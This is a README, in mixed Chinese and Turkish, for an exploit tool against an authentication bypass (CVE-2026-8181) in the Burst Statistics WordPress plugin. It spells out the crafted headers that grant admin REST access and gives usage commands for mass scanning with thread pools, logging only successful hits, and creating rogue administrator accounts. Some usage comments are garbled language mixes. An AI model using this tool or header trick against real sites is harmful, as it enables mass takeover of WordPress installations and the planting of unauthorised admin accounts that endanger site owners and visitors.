murrez/CVE-2026-8181

## 项目概述 / Proje özeti ### 英语 | 字段 | 详情 | |:---:|:---| | **漏洞类型** | [Burst Statistics](https://wordpress.org/plugins/burst-statistics/) 中的**身份验证绕过** (CWE-287)：精心构造的请求头可将 REST 请求提升至**完整管理员上下文**。 | | **受影响版本** | **受影响：** `3.4.0`、`3.4.1`、`3.4.1.1` · **请使用：** **`3.4.2` 或更高版本** | | **严重程度** | CVSS ~9.8 (严重)；在适用条件下可远程、未经身份验证利用。 | | **本仓库** | `CVE-2026-8181.py` — 实验室自动化工具：单目标、批量列表、线程池、选择性 TXT 输出。 | ### 土耳其语 | Alan | Detay | |:---:|:---| | **Ne** | [Burst Statistics](https://wordpress.org/plugins/burst-statistics/) için **kimlik doğrulama atlatası** (CWE-287). Özel başlıklar ile REST isteğinde **tam yönetici bağlamı**. | | **Sürüm** | **Etkilenir:** `3.4.0`, `3.4.1`, `3.4.1.1` · **Önerilir:** **`3.4.2` ve üzeri** | | **Ciddiyet** | CVSS ~9.8 (Critical); uygun koşullarda uzaktan ve kimlik gerektirmeden. | | **Bu depo** | `CVE-2026-8181.py` — lab otomasyonu: tek hedef, liste taraması, iş parçacığı havuzu, seçici TXT çıktısı. | ## 视觉素材 / Dokümantasyon görselleri ### 英语 GitHub 风格的 Markdown 在仓库中没有文件的情况下无法嵌入二进制 **GIF**。上方的 **Typing SVG** 代码片段（通过 CDN 加载）模拟了动态效果。要添加您自己的屏幕截图，请执行： ```  ``` ### 土耳其语 GitHub Markdown, repoda dosya olmadan **GIF** gömmeyi desteklemez. Üstteki **Typing SVG** (CDN) yazı animasyonu verir. Kendi demosun için: ```  ``` ## 攻击链 (Mermaid) / Saldırı zinciri ### 英语 — 图表标签 ``` flowchart LR A[Client request] --> B[X-BURSTMAINWP: 1] A --> C[Authorization: Basic] B --> D[plugins_loaded] D --> E[is_mainwp_authenticated] E --> F{wp_authenticate_application_password == null?} F -->|Mis-handled branch| G[get_user_by login] G --> H[wp_set_current_user] H --> I[REST: full admin context] ``` ### 土耳其语 — 同样的流程 ``` flowchart LR A[İstek] --> B[X-BURSTMAINWP: 1] A --> C[Authorization: Basic] B --> D[plugins_loaded] D --> E[is_mainwp_authenticated] E --> F{wp_authenticate_application_password == null?} F -->|Yanlış dal| G[get_user_by login] G --> H[wp_set_current_user] H --> I[REST: tam admin bağlamı] ``` ## 工具功能 / Araç yetenekleri ### 英语 | 功能 | 描述 | |--------|-------------| | **单目标** | `-u` 基础 URL | | **批量目标** | `-f targets.txt`（每行一个 URL；`#` 为注释） | | **并发** | `-j N` 工作线程（有上限） | | **合并文件** | `-o file.txt` — 与 `-f` 一起使用时，**仅追加成功的漏洞利用结果** | | **按主机分类文件** | `--output-dir` — **仅成功的主机**会生成 `host.txt`（失败的被跳过） | | **新建管理员** | `--create-user` — 通过 REST 创建随机用户（密码随后会显示在报告中） | | **TLS (实验室)** | `-k` 禁用证书验证（仅限受信任的实验室环境） | 与 `-f` 一起使用时，**`-o` 和 `--output-dir` 是互斥的。** ### 土耳其语 | Özellik | Açıklama | |--------|-----------| | **Tek hedef** | `-u` kök adres | | **Çoklu hedef** | `-f targets.txt` (satır başına URL; `#` yorumu) | | **Paralellik** | `-j N` işçi (üst sınırlı) | | **Tek dosya** | `-o dosya.txt` — `-f` ile **yalnızca başarılı exploit** eklenir | | **Klasör çıktısı** | `--output-dir` — **sadece başarılılar** `host.txt` alır | | **Yeni admin** | `--create-user` — REST ile rastgele kullanıcı (şifre raporda) | | **TLS (lab)** | `-k` sertifika doğrulamasını kapatır (yalnızca güvenilir lab) | `-f` modunda **`-o` ile `--output-dir` aynı anda kullanılamaz.** ## 安装 / Kurulum ``` pip3 install requests urllib3 ``` ## 使用示例 / Kullanım örnekleri ### 英语 ``` # 单站点，报告文件 python3 CVE-2026-8181.py -u http://lab.local -U admin -o report.txt -k # 单站点 + 新管理员（实验） python3 CVE-2026-8181.py -u http://lab.local -U admin --create-user -o report.txt -k # 批量 + 合并文件（仅限成功） python3 CVE-2026-8181.py -f targets.txt -j 20 -o successes.txt -k # 批量 + 文件夹中按主机划分的文件（仅限成功） python3 CVE-2026-8181.py -f targets.txt -j 20 --output-dir ./results -k ``` ### 土耳其语 ``` # Tek 站点, rapor python3 CVE-2026-8181.py -u http://lab.local -U admin -o sonuc.txt -k # Tek 站点 + yeni 管理员 (lab) python3 CVE-2026-8181.py -u http://lab.local -U admin --create-user -o sonuc.txt -k # Çoklu + birleşik 文件 (yalnızca 成功) python3 CVE-2026-8181.py -f targets.txt -j 20 -o basarili.txt -k # Çoklu + klasörde 按 站点 文件 (yalnızca 成功) python3 CVE-2026-8181.py -f targets.txt -j 20 --output-dir ./results -k ``` ## 空的 `Password:` 字段 / Boş parola satırı ### 英语 成功的绕过**不会泄露受害用户的真实密码** —— PoC 中的 Basic 密码是**伪造的**。除非使用 **`--create-user`** 创建了**新**账户（在这种情况下会写入生成的密码），否则 `Password:` 行将保持为空。 ### 土耳其语 Başarılı bypass **mevcut kullanıcının gerçek parolasını sızdırmaz** — PoC’taki Basic parola **sahtedir**. `Password:` satırı **`--create-user`** ile **yeni** hesap oluşturulmadıkça boş kalır; oluşturulduysa üretilen şifre yazılır. ## 参考资料 / Kaynaklar ### 英语 - [Burst Statistics — WordPress 插件目录](https://wordpress.org/plugins/burst-statistics/) - 在协调披露中常被引用：**Wordfence Threat Intelligence**、**PRISM** - CVE: [MITRE CVE-2026-8181](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-8181) · [NVD](https://nvd.nist.gov/vuln/detail/CVE-2026-8181) ### 土耳其语 - [Burst Statistics — WordPress eklenti dizini](https://wordpress.org/plugins/burst-statistics/) - Koordineli açıklamada sık geçen: **Wordfence Threat Intelligence**, **PRISM** - CVE: [MITRE CVE-2026-8181](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-8181) · [NVD](https://nvd.nist.gov/vuln/detail/CVE-2026-8181) ## 免责声明 / Feragatname ### 英语 仅适用于**获得书面授权的**评估和**您自己的实验室**。在许多司法管辖区，未经授权的使用是违法的。作者及本 README 的维护者对滥用行为**不承担任何责任**。 ### 土耳其语 **Yazılı izinli** değerlendirmeler ve **kendi laboratuvarınız** içindir. İzinsiz kullanım birçok ülkede **yasadışıdır**. Yazarlar ve bu README’nin düzenleyicisi kötüye kullanımdan **sorumlu değildir**.

标签：Burst Statistics, CISA项目, CVE-2026-8181, CVSS 9.8, GitHub Advanced Security, Maven, PoC, Python, TXT报告, Web安全, Wordfence, WordPress插件, 多线程扫描, 安全加固, 授权测试, 数据展示, 无后门, 暴力破解, 漏洞验证, 红队, 网络安全, 蓝队分析, 身份验证绕过, 隐私保护, 高危漏洞